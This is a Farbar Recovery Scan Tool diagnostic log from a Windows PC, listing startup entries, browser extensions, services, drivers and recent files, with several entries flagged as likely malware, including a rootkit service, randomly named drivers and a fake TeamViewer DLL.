(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746
ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4
Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: jefccanc.Daniel-1506042165545
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-05-29]
FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-05-29]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-05-29]
FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff
FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-05-29]
CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]
CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]
CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]
CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]
CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]
CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]
CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]
CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]
CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]
CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]
CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]
CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]
CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]
CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]
CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]
CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]
CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]
CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-05-29]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)

S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]
S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)
U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)
S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)
R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)
R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)
R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)
R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
R3 ehkoru; system32\drivers\knruxb.sys [X]
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-05-31 20:48 - 2018-05-31 20:49 - 000022194 _____ C:\Users\Dan\Desktop\FRST.txt
2018-05-31 20:46 - 2018-05-31 19:26 - 002413056 _____ (Farbar) C:\Users\Dan\Desktop\FRST64.exe
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 23:23 - 2018-05-30 23:23 - 000142672 ____N C:\Windows\system32\Drivers\cooeilos.sys
2018-05-30 22:04 - 2018-05-30 22:04 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}
2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg
2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw
2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk
2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup
2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp
2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx
2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix
2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg
2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch
2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad
2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep
2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol
2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue
2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl
2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo
2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm
2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc
2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil
2018-05-12 19:41 - 2018-05-12 19:41 - 000000000 ____D C:\Users\Dan\AppData\Local\csdhnlo
2018-05-11 20:22 - 2018-05-11 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\coiblsg
2018-05-10 20:22 - 2018-05-10 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\widxtlb
2018-05-09 20:13 - 2018-05-09 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\seagduw
2018-05-08 20:41 - 2018-05-08 20:41 - 000000000 ____D C:\Users\Dan\AppData\Local\vdngxtz
2018-05-07 20:13 - 2018-05-07 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\nibrvwa
2018-05-06 22:10 - 2018-05-06 22:10 - 000838852 _____ C:\Users\Dan\Documents\gwyneth_paltrow_27c1e.xcf
2018-05-06 20:19 - 2018-05-06 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\pcbgxvh
2018-05-05 19:18 - 2018-05-05 19:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wmeapzk
2018-05-04 20:20 - 2018-05-04 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\usizorv
2018-05-03 20:14 - 2018-05-03 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\csdkxma
2018-05-02 20:04 - 2018-05-02 20:04 - 000000000 ____D C:\Users\Dan\AppData\Local\cwnairx
2018-05-01 20:22 - 2018-05-01 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\webnulm

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-05-31 20:48 - 2016-03-03 14:05 - 000000000 ____D C:\FRST
2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various Software Shortcuts
2018-05-31 20:37 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
2018-05-31 20:36 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive
2018-05-31 20:36 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe
2018-05-31 20:34 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-05-31 20:26 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware
2018-05-31 20:24 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre
2018-05-31 20:24 - 2018-03-22 21:52 - 000000292 _____ C:\ProgramData\rwi.hhad
2018-05-31 20:23 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr
2018-05-31 20:23 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-05-31 20:22 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe
2018-05-30 23:23 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE
2018-05-30 22:04 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer
2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics
2018-05-29 22:17 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf
2018-05-29 21:55 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio
2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump
2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps
2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}
2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}
2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}
2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}
2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}
2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5
2018-05-29 20:36 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF
2018-05-28 23:34 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2018-05-27 22:13 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0
2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8
2018-05-16 00:00 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc

==================== Files in the root of some directories =======

2018-03-22 21:52 - 2018-05-31 20:37 - 000000004 _____ () C:\ProgramData\lock.dat
2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
